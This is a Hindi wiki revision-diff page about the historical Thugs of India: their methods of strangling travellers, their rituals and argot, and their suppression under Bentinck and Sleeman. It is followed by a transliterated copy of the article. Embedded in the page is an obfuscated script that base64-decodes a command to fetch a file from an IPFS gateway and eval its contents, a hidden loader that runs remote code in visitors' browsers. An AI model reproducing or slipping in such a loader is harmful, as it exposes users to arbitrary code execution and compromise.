Difference between revisions of "ठग जाति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "मौका " to "मौक़ा ")
m (Text replace - " कदम " to " क़दम ")
Line 2: Line 2:
 
'''ठग''' ([[संस्कृत भाषा]] में स्थग, अर्थात चोर, बदमाश) पेशेवर हत्यारों के सुसंगठित परिसंघ के सदस्य, जो सैकड़ों [[वर्ष|वर्षों]] तक दल बनाकर [[भारत]] भर में घूमते रहे।<ref>ठगों का सबसे पुराना प्रामाणिक विवरण ज़ियाउद्दीन बरनी की कृति तारीख़े फ़िरोज़शाही में मिलता है, जो लगभग 1356 की है।</ref> ठग चालाकी से राहगीरों का विश्वास प्राप्त कर लेते थे और उनके साथ शामिल हो जाते थे। मौक़ा पाकर वे उनके गले में रुमाल या फंदा डाल कर उनकी हत्या कर देते थे और उनका माल लूटकर उन्हें दफ़ना देते थे। यह सब कुछ विशेष धार्मिक अनुष्ठानों के बाद प्राचीन और कठोर नियमों के अनुसार किया जाता था, जिसमें गैंती का पवित्रीकरण और शक्कर का अर्पण प्रमुख था। हालांकि ठग अपनी उत्पत्ति सात [[मुस्लिम]] जनजातियों से मानते थे, लेकिन [[हिंदू]] शुरू से ही जुड़ गए थे। बहरहाल, उनके द्वारा विध्वंस की देवी काली की पूजा जैसे आचार तथा धार्मिक मान्यताएं किसी भी तरह [[इस्लाम]] के प्रभाव को नहीं दर्शाती है। यह बिरादरी अपनी गुप्त बोली रमसी तथा संकेतों का उपयोग करती थी, जिससे इसके सदस्य एक-दूसरे को पहचानते थे।  
 
'''ठग''' ([[संस्कृत भाषा]] में स्थग, अर्थात चोर, बदमाश) पेशेवर हत्यारों के सुसंगठित परिसंघ के सदस्य, जो सैकड़ों [[वर्ष|वर्षों]] तक दल बनाकर [[भारत]] भर में घूमते रहे।<ref>ठगों का सबसे पुराना प्रामाणिक विवरण ज़ियाउद्दीन बरनी की कृति तारीख़े फ़िरोज़शाही में मिलता है, जो लगभग 1356 की है।</ref> ठग चालाकी से राहगीरों का विश्वास प्राप्त कर लेते थे और उनके साथ शामिल हो जाते थे। मौक़ा पाकर वे उनके गले में रुमाल या फंदा डाल कर उनकी हत्या कर देते थे और उनका माल लूटकर उन्हें दफ़ना देते थे। यह सब कुछ विशेष धार्मिक अनुष्ठानों के बाद प्राचीन और कठोर नियमों के अनुसार किया जाता था, जिसमें गैंती का पवित्रीकरण और शक्कर का अर्पण प्रमुख था। हालांकि ठग अपनी उत्पत्ति सात [[मुस्लिम]] जनजातियों से मानते थे, लेकिन [[हिंदू]] शुरू से ही जुड़ गए थे। बहरहाल, उनके द्वारा विध्वंस की देवी काली की पूजा जैसे आचार तथा धार्मिक मान्यताएं किसी भी तरह [[इस्लाम]] के प्रभाव को नहीं दर्शाती है। यह बिरादरी अपनी गुप्त बोली रमसी तथा संकेतों का उपयोग करती थी, जिससे इसके सदस्य एक-दूसरे को पहचानते थे।  
  
हालांकि इन दलों को समाप्त करने के यदा-कदा प्रयास किए गए, लेकिन इस व्यवस्था को गंभीर चोट जब पहुंची, जब [[लॉर्ड विलियम बैंटिक]] ([[भारत]] के [[गवर्नर जनरल|गवर्नर-जनरल]], 1833-35) ने इनके ख़िलाफ़ कठोर कदम उठाए। उनके प्रमुख दूत कैप्टन विलियम स्लीमैन ने कई रियासतों में अधिकारियों की मदद से इस परेशानी को हल करने में इतनी सफलता प्राप्त की कि 1831 से 1837 के बीच कम से कम 3,266 ठग पकड़े गए, जिनमें से 412 को फांसी दे दी गई, 483 सरकारी गवाह बन गए तथा अन्य सभी को देश निकाला या आजीवन कारावास की सज़ा दी गई। इसके बाद यह बिरादरी समाप्त हो गई।  
+
हालांकि इन दलों को समाप्त करने के यदा-कदा प्रयास किए गए, लेकिन इस व्यवस्था को गंभीर चोट जब पहुंची, जब [[लॉर्ड विलियम बैंटिक]] ([[भारत]] के [[गवर्नर जनरल|गवर्नर-जनरल]], 1833-35) ने इनके ख़िलाफ़ कठोर क़दम उठाए। उनके प्रमुख दूत कैप्टन विलियम स्लीमैन ने कई रियासतों में अधिकारियों की मदद से इस परेशानी को हल करने में इतनी सफलता प्राप्त की कि 1831 से 1837 के बीच कम से कम 3,266 ठग पकड़े गए, जिनमें से 412 को फांसी दे दी गई, 483 सरकारी गवाह बन गए तथा अन्य सभी को देश निकाला या आजीवन कारावास की सज़ा दी गई। इसके बाद यह बिरादरी समाप्त हो गई।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 14:17, 11 May 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thag (sanskrit bhasha mean sthag, arthat chor, badamash) peshevar hatyaroan ke susangathit parisangh ke sadasy, jo saik doan varshoan tak dal banakar bharat bhar mean ghoomate rahe.[1] thag chalaki se rahagiroan ka vishvas prapt kar lete the aur unake sath shamil ho jate the. mauqa pakar ve unake gale mean rumal ya phanda dal kar unaki hatya kar dete the aur unaka mal lootakar unhean dafana dete the. yah sab kuchh vishesh dharmik anushthanoan ke bad prachin aur kathor niyamoan ke anusar kiya jata tha, jisamean gaianti ka pavitrikaran aur shakkar ka arpan pramukh tha. halaanki thag apani utpatti sat muslim janajatiyoan se manate the, lekin hiandoo shuroo se hi ju d ge the. baharahal, unake dvara vidhvans ki devi kali ki pooja jaise achar tatha dharmik manyataean kisi bhi tarah islam ke prabhav ko nahian darshati hai. yah biradari apani gupt boli ramasi tatha sanketoan ka upayog karati thi, jisase isake sadasy ek-doosare ko pahachanate the.

halaanki in daloan ko samapt karane ke yada-kada prayas kie ge, lekin is vyavastha ko ganbhir chot jab pahuanchi, jab l aaurd viliyam baiantik (bharat ke gavarnar-janaral, 1833-35) ne inake khilaf kathor qadam uthae. unake pramukh doot kaiptan viliyam slimain ne kee riyasatoan mean adhikariyoan ki madad se is pareshani ko hal karane mean itani saphalata prapt ki ki 1831 se 1837 ke bich kam se kam 3,266 thag pak de ge, jinamean se 412 ko phaansi de di gee, 483 sarakari gavah ban ge tatha any sabhi ko desh nikala ya ajivan karavas ki saza di gee. isake bad yah biradari samapt ho gee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. thagoan ka sabase purana pramanik vivaran ziyauddin barani ki kriti tarikhe firozashahi mean milata hai, jo lagabhag 1356 ki hai.

bahari k diyaan

sanbandhit lekh